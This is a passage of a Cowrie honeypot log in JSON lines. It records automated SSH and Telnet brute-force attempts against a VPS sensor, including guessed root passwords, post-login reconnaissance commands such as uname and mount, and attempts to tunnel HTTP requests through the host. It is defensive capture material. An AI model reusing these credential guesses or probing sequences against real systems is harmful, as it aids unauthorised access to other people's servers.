CS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:11:56.918392Z","src_ip":"217.154.1.158","session":"6b3ea12e66fe"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:11:56.963493Z","src_ip":"217.154.1.158","session":"6b3ea12e66fe"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:11:57.980560Z","src_ip":"217.154.1.158","session":"6b3ea12e66fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63800,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b68d10dc456","protocol":"ssh","message":"New connection: 212.227.235.229:63800 (1.2.3.4:22) [session: 3b68d10dc456]","sensor":"my-vps","timestamp":"2025-08-26T20:12:04.793401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:12:12.601501Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:12:12.602447Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55370,"dst_ip":"1.2.3.4","dst_port":22,"session":"a325a0adf69f","protocol":"ssh","message":"New connection: 217.154.1.158:55370 (1.2.3.4:22) [session: a325a0adf69f]","sensor":"my-vps","timestamp":"2025-08-26T20:12:14.407616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:12:14.408618Z","src_ip":"217.154.1.158","session":"a325a0adf69f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:12:14.422729Z","src_ip":"217.154.1.158","session":"a325a0adf69f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T20:12:14.466411Z","src_ip":"217.154.1.158","session":"a325a0adf69f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:15.483218Z","src_ip":"217.154.1.158","session":"a325a0adf69f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62218,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca59ec94282a","protocol":"telnet","message":"New connection: 212.227.125.160:62218 (1.2.3.4:23) [session: ca59ec94282a]","sensor":"my-vps","timestamp":"2025-08-26T20:12:21.375019Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38639,"dst_ip":"1.2.3.4","dst_port":22,"session":"21e1d4b54fd3","protocol":"ssh","message":"New connection: 213.209.150.239:38639 (1.2.3.4:22) [session: 21e1d4b54fd3]","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.154818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.155498Z","src_ip":"213.209.150.239","session":"21e1d4b54fd3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.212320Z","src_ip":"213.209.150.239","session":"21e1d4b54fd3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.494456Z","src_ip":"213.209.150.239","session":"21e1d4b54fd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31151,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31151","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.552161Z","session":"21e1d4b54fd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.608949Z","src_ip":"213.209.150.239","session":"21e1d4b54fd3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":706,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:706","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.763353Z","session":"21e1d4b54fd3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.820141Z","src_ip":"213.209.150.239","session":"21e1d4b54fd3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:25.877947Z","src_ip":"213.209.150.239","session":"21e1d4b54fd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":29198,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ecbba18469f","protocol":"ssh","message":"New connection: 212.227.125.160:29198 (1.2.3.4:22) [session: 4ecbba18469f]","sensor":"my-vps","timestamp":"2025-08-26T20:12:28.980307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:12:28.981354Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:12:29.247688Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R5t^Y","message":"login attempt [root/1q@W3e$R5t^Y] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:12:29.651705Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:12:29.913797Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-26T20:12:29.914547Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:30.037926Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:30.039313Z","src_ip":"212.227.125.160","session":"4ecbba18469f"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57190,"dst_ip":"1.2.3.4","dst_port":22,"session":"48d08121a24d","protocol":"ssh","message":"New connection: 217.154.1.158:57190 (1.2.3.4:22) [session: 48d08121a24d]","sensor":"my-vps","timestamp":"2025-08-26T20:12:31.844203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:12:31.844898Z","src_ip":"217.154.1.158","session":"48d08121a24d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:12:31.859304Z","src_ip":"217.154.1.158","session":"48d08121a24d"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:12:31.905074Z","src_ip":"217.154.1.158","session":"48d08121a24d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:32.923105Z","src_ip":"217.154.1.158","session":"48d08121a24d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58220,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1d27be54348","protocol":"ssh","message":"New connection: 217.72.205.35:58220 (1.2.3.4:22) [session: c1d27be54348]","sensor":"my-vps","timestamp":"2025-08-26T20:12:48.605329Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:48.606475Z","src_ip":"217.72.205.35","session":"c1d27be54348"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56472,"dst_ip":"1.2.3.4","dst_port":22,"session":"e694db1b9678","protocol":"ssh","message":"New connection: 217.154.1.158:56472 (1.2.3.4:22) [session: e694db1b9678]","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.317512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.318160Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.332336Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.379571Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:12:49.473674Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.474462Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.492890Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:49.494889Z","src_ip":"217.154.1.158","session":"e694db1b9678"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@123","message":"login attempt [root/Huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:12:51.364838Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.session.closed","duration":32.8223078250885,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:12:54.197265Z","src_ip":"212.227.125.160","session":"ca59ec94282a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49574,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce042f386e32","protocol":"ssh","message":"New connection: 217.154.1.158:49574 (1.2.3.4:22) [session: ce042f386e32]","sensor":"my-vps","timestamp":"2025-08-26T20:13:06.892547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:13:06.893508Z","src_ip":"217.154.1.158","session":"ce042f386e32"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:13:06.907313Z","src_ip":"217.154.1.158","session":"ce042f386e32"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker123","message":"login attempt [worker/worker123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:13:06.951449Z","src_ip":"217.154.1.158","session":"ce042f386e32"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:13:07.967955Z","src_ip":"217.154.1.158","session":"ce042f386e32"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:13:08.912200Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T20:13:08.912923Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"3.1","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:13:12.046984Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.session.closed","duration":"70.4","message":"Connection lost after 70.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:13:15.182924Z","src_ip":"212.227.235.229","session":"3b68d10dc456"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55118,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf90a35d70dc","protocol":"ssh","message":"New connection: 217.154.1.158:55118 (1.2.3.4:22) [session: bf90a35d70dc]","sensor":"my-vps","timestamp":"2025-08-26T20:13:24.458819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:13:24.459763Z","src_ip":"217.154.1.158","session":"bf90a35d70dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh